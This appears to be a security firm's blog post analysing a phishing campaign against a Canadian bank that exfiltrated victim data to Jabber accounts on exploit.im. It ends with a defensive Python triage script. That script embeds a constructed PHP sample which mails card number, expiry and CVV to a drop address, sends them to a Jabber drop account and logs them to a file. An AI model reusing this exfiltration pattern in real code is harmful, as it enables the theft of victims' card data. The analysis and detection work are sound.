While analyzing a recent phishing campaign targeting a Canadian financial institution, we came across an interesting technique used by the phishers to exfiltrate the personal and financial data obtained from victims. Historically, phishers have most commonly used disposable email accounts to collect compromised information from phishing campaigns. Sending compromised data to a temporary email account has likely been adopted by the phishing community because email accounts are easily accessible, and mailing scripts can be used or built with very little PHP knowledge. Instead of forwarding phished data to an email account, we have also seen phishers that have stored victim information on the compromised phishing server, which allows them to consolidate all of the data into one file rather than having to sift through individual emails for each piece of information.
[Figure: Most Common Drop Email Account Providers (2016 Phishing Trends & Intelligence Report)]
Instead of using an email drop account, the scammers in this recent campaign used Jabber, an instant messaging service based on the XMPP protocol, to collect phished victim information. XMPP is an open standard protocol that is more decentralized than traditional email. Rather than routing all communications through a central server, as is the case with email or traditional instant messaging services, Jabber servers are set up independently of one another. Because anyone can stand up a Jabber server for individual use, the protocol gives users greater control over their communications and enhanced privacy: messages travel only between the servers involved in a conversation rather than being routed through a central location.
The scammers in this campaign used accounts created on the exploit.im Jabber server to receive phished information.
[Figure: Beginning of Function Used to Send Phished Data via Jabber]
The use of exploit.im is interesting because, although it was once a rather popular Jabber server among hackers, it began falling out of favor in late 2014 after it was rumored to have been compromised. Still, exploit.im has recently been connected to some high-profile hackers, such as “Tessa88@exploit.im,” who has been linked to the data breaches of LinkedIn, MySpace, Twitter, Tumblr, and VK, and Rory Guidry (aka firstname.lastname@example.org), who was arrested as part of the Darkode forum takedown.
It is unknown why the phishers in this campaign chose Jabber as their exfiltration method. It is a curious choice since, absent end-to-end encryption of the messages and without control of the Jabber server, nothing stops the server's administrator from scanning and logging the contents of the messages carrying the compromised information. It does show, however, that phishers are continually developing new methods to facilitate their malicious activities.
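As an added example (not code from this post or from the kit it analyzes), the following Python routine triages recovered phishing-kit source for the three exfiltration styles described above: mail drops, Jabber drops, and local result files. The PHP fragment, the watchlist, the regexes, and the function name are constructed for this example.

```python
import re
from typing import Dict, List

# Constructed PHP fragment modelled on the exfiltration styles the post
# describes (mail drop, Jabber drop, local result file). It is NOT the kit
# recovered from the campaign; all addresses and file names are invented.
SAMPLE_KIT_PHP = r'''<?php
$message = "Card: $card | Exp: $exp | CVV: $cvv";
$recipient = "kit-operator-example@example.com";
mail($recipient, "New Result", $message);
$jid = "drop-account-example@exploit.im";
send_jabber($jid, "jabberpass123", $message);
file_put_contents("rezult.txt", $message . "\n", FILE_APPEND);
?>'''

# XMPP domains worth flagging when seen in kit source.
# exploit.im is the server named in the post; extend with your own intel.
JABBER_WATCHLIST = {"exploit.im"}

ADDRESS_RE = re.compile(r'[\w.+-]+@(?:[\w-]+\.)+[a-z]{2,}', re.I)
XMPP_HINT_RE = re.compile(r'jabber|xmpp|\bjid\b', re.I)
FILE_WRITE_RE = re.compile(r'\b(?:file_put_contents|fwrite|fopen)\s*\(', re.I)


def triage_kit(php_source: str) -> Dict[str, List[str]]:
    """Return drop accounts (split into email vs. Jabber) and any lines
    that write victim data to a local file on the phishing server."""
    result: Dict[str, List[str]] = {
        "email_drops": [], "jabber_drops": [], "local_storage": []}
    for line in php_source.splitlines():
        for addr in ADDRESS_RE.findall(line):
            domain = addr.rsplit("@", 1)[1].lower()
            # A watchlisted XMPP domain, or a jabber/xmpp/jid hint on the
            # same line, marks the address as a Jabber drop account.
            if domain in JABBER_WATCHLIST or XMPP_HINT_RE.search(line):
                result["jabber_drops"].append(addr)
            else:
                result["email_drops"].append(addr)
        if FILE_WRITE_RE.search(line):
            result["local_storage"].append(line.strip())
    return result


if __name__ == "__main__":
    for category, hits in triage_kit(SAMPLE_KIT_PHP).items():
        print(f"{category}: {hits}")
```

Both the email and Jabber drop accounts it extracts are the identifiers to report to the respective providers for takedown.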